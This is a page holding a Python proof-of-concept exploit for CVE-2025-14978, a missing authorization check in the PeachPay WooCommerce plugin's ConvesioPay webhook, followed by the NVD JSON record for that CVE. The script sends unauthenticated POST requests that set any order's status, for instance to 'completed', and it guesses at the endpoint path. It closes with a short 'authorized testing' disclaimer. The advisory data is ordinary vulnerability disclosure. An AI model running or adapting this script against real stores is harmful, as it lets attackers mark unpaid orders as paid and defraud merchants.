CVE-2025-14978

import requests import json # CVE-2025-14978 PoC - Unauthorized Order Status Modification # Target: PeachPay WooCommerce Plugin < 1.119.9 # Vulnerability: Missing capability check on ConvesioPay webhook REST endpoint target_url = "http://target-wordpress-site.com" # The webhook endpoint path (example, actual path may vary) webhook_endpoint = "/wp-json/peachpay/v1/convesiopay/webhook" # Target order ID to modify target_order_id = 12345 # Desired malicious status (e.g., 'completed', 'processing', 'pending') target_status = "completed" # Construct the malicious request url = f"{target_url}{webhook_endpoint}" payload = { "order_id": target_order_id, "status": target_status, # Additional parameters may be required depending on implementation "order_status": target_status } headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (compatible; CVE-2025-14978-PoC)" } print(f"[*] Sending malicious request to: {url}") print(f"[*] Target Order ID: {target_order_id}") print(f"[*] Target Status: {target_status}") try: response = requests.post(url, json=payload, headers=headers, timeout=10) print(f"[*] Response Status Code: {response.status_code}") print(f"[*] Response Body: {response.text}") if response.status_code == 200: print("[+] Exploit successful - Order status may have been modified") else: print("[-] Exploit may have failed - Check response") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") # Note: This PoC is for educational and authorized testing purposes only.

{"cve": {"id": "CVE-2025-14978", "sourceIdentifier": "[email protected]", "published": "2026-01-20T02:15:45.873", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The PeachPay — Payments & Express Checkout for WooCommerce (supports Stripe, PayPal, Square, Authorize.net) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability checks on the ConvesioPay webhook REST endpoint in all versions up to, and including, 1.119.8. This makes it possible for unauthenticated attackers to modify the status of arbitrary WooCommerce orders."}, {"lang": "es", "value": "El plugin PeachPay — Payments &amp; Express Checkout para WooCommerce (compatible con Stripe, PayPal, Square, Authorize.net) para WordPress es vulnerable a la modificación no autorizada de datos debido a la falta de controles de capacidad en el endpoint REST del webhook de ConvesioPay en todas las versiones hasta la 1.119.8, inclusive. Esto posibilita que atacantes no autenticados modifiquen el estado de órdenes arbitrarias de WooCommerce."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/peachpay-for-woocommerce/tags/1.119.5/core/payments/convesiopay/routes/class-peachpay-convesiopay-webhook.php#L33", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5480a151-3e3a-46ba-9712-6c61fba06812?source=cve", "source": "[email protected]"}]}}